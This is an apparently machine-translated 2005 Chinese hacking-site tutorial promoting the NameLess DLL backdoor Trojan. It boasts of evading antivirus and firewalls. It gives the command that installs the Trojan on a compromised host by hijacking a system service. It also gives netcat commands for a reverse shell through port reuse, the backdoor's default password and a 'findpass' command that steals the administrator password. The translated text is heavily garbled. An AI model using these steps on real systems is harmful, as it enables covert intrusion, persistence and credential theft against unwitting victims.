Mad virus mad firewall—emerging-Trojan NameLess BackDoor Vengeance in mind(figure)-vulnerability warning-the black bar safety net

2005-10-21T00:00:00
ID MYHACK58:6220053861
Type myhack58
Reporter 佚名
Modified 2005-10-21T00:00:00

Description

Editor's note: mention of the NameLess Latest 1. 4 version of the source code of the site there is a download NameLess Virus is a new Xing of DLL-Trojans, this Trojan was born not long, but is definitely a horse of great potential of a thousand miles Colt is. Speaking of the NameLess Trojan predecessor, had referred to Banyan brother of the BITS and WinEggDrop the PortLess it. Both the famous Trojan once all the scenery of the moment, can be said to be the Trojan world of the elders. And NameLess The Trojan is brought together above the two Trojans the advantage, in the target machine's Process Manager is not visible, usually there is no Port, to provide a forward connection and reverse connection of the two functions. While NameLess Virus and remove all the drawbacks, such as the bounce of the cmd. exe process in the target machine's Process Manager can also be hidden without the use of BITSservice, etc. horses: do not start the port, no process, seefirewalland antivirus software can get me to do! Mad at you, ha ha to. NameLess BackDoor drill The NameLess Virus installed on the remote host to connect the Trojan to control the host, just like a field in the antivirus andfirewallunder the nose, yet silent quiet of the dark war. One, the wind sneaked into the night-the installation Download the NameLess The BackDoor Trojan, compressed package there are two named NameLess. dll file, and a Pack compression applied through the shell, one is to Unpack the uncompressed packers. First in the local with a variety of antivirus software and scan the two files to the author with the latest virus database KV2005, but has always been to kill the poison ability is known for KV2005 turned out for the two Trojan files turn a blind eye. Uh, which erupted can be assured in any environment be installed. How the Trojan is installed to a remote computer? Of course the most simple is the scan attack on a computer systemvulnerability, and then attack the invading control. In many ways, anyway you get to the remote host control, will be above any one“NameLess.dll”file to upload to on the remote host. Here the author is using the Ttelnet remote connection after writing a FTP download BAT file directly in the local established a FTPservice, via FTPserviceto download the uploaded file of the contents of the previous Journal, here is not to make too much explanation. in. The following highlights a look at how I mounted the Trojan file! In the remote Ttelnet command window, switch to the File Upload Directory, and enter the following command, as shown in Figure 1: The ! Rundll32 NameLess.dll,Install Execute the command after the back door was installed successfully, the back door willautomaticallyto replace the systemserviceSens ServiceDll file in the computer after the Restart to Svchost. exe to start. Tip: due to the NameLess Trojan is a DLL-Trojans, and therefore in the installation and startup of the process on the remote host antivirus will not have any tips and reactions. Second, through the wall silently-connecting Install and start the process to successfully get the antivirus, the following look at the NameLess Virus how to getfirewallpowerless. Tip: NameLess Virus there are two connecting ways: positive connection and reverse connection, wherein the reverse way of connecting allowsfirewalldoes not issue any prompt. While NameLess BackDoor in connection Backdoor when using a port multiplexingart, through the reuse of system processes that open any one of the ports, and therefore can easily penetrate variousfirewall. We first need to scan a remote host on the opening which ports, assume that a remote host IP address: 192.168.1.11 on open a 1 3 9 port, you can locally open a command window, switch to the Swiss army knife of NC in the same directory, run the following command: nc -l-p 1 2 3 4 5 Command after the execution of the will in the local monitor 1 2 3 4 5 the port, and then open a command window, enter the following command, as shown in Figure 2: The ! nc 192.168.1.11 1 3 9 After establishing the connection enter the following content, as shown in Figure 3: The ! dargun|192.168.1.11:1 2 3 4 5 Wherein the IP address according to the specific situation to be changed. The command executed, in just the monitor window you can see the emergence of the connected prompt:“Enter Password:”, enter the password 1 5 8 3 5 2 6 9 2 after you can successfully login to the remote host without beingfirewallfound! If I amfirewall, and a certain mad, ha) Third, I want to--control The success of“mad”antivirus and“crazy”firewall, you can now control the remote host. NameLess Virus powerful also reflected in its control function, the connection log to a remote host, enter the help command, you can see the detailed command help information, as shown in Figure 4)。 If you use winshell or wineggdropshell words, it should be for this model the back door is not unfamiliar, but even if never used such a backdoor, it will feel very simple. ! 1. Clever Pirates of the administrator password The connection on the remote host after this? I have to think...... Oh, see the Administrator's password is how much! In the command window directly input“findpass”command, Soon you can see the administrator password. as shown in Figure 5, The really simple enough! !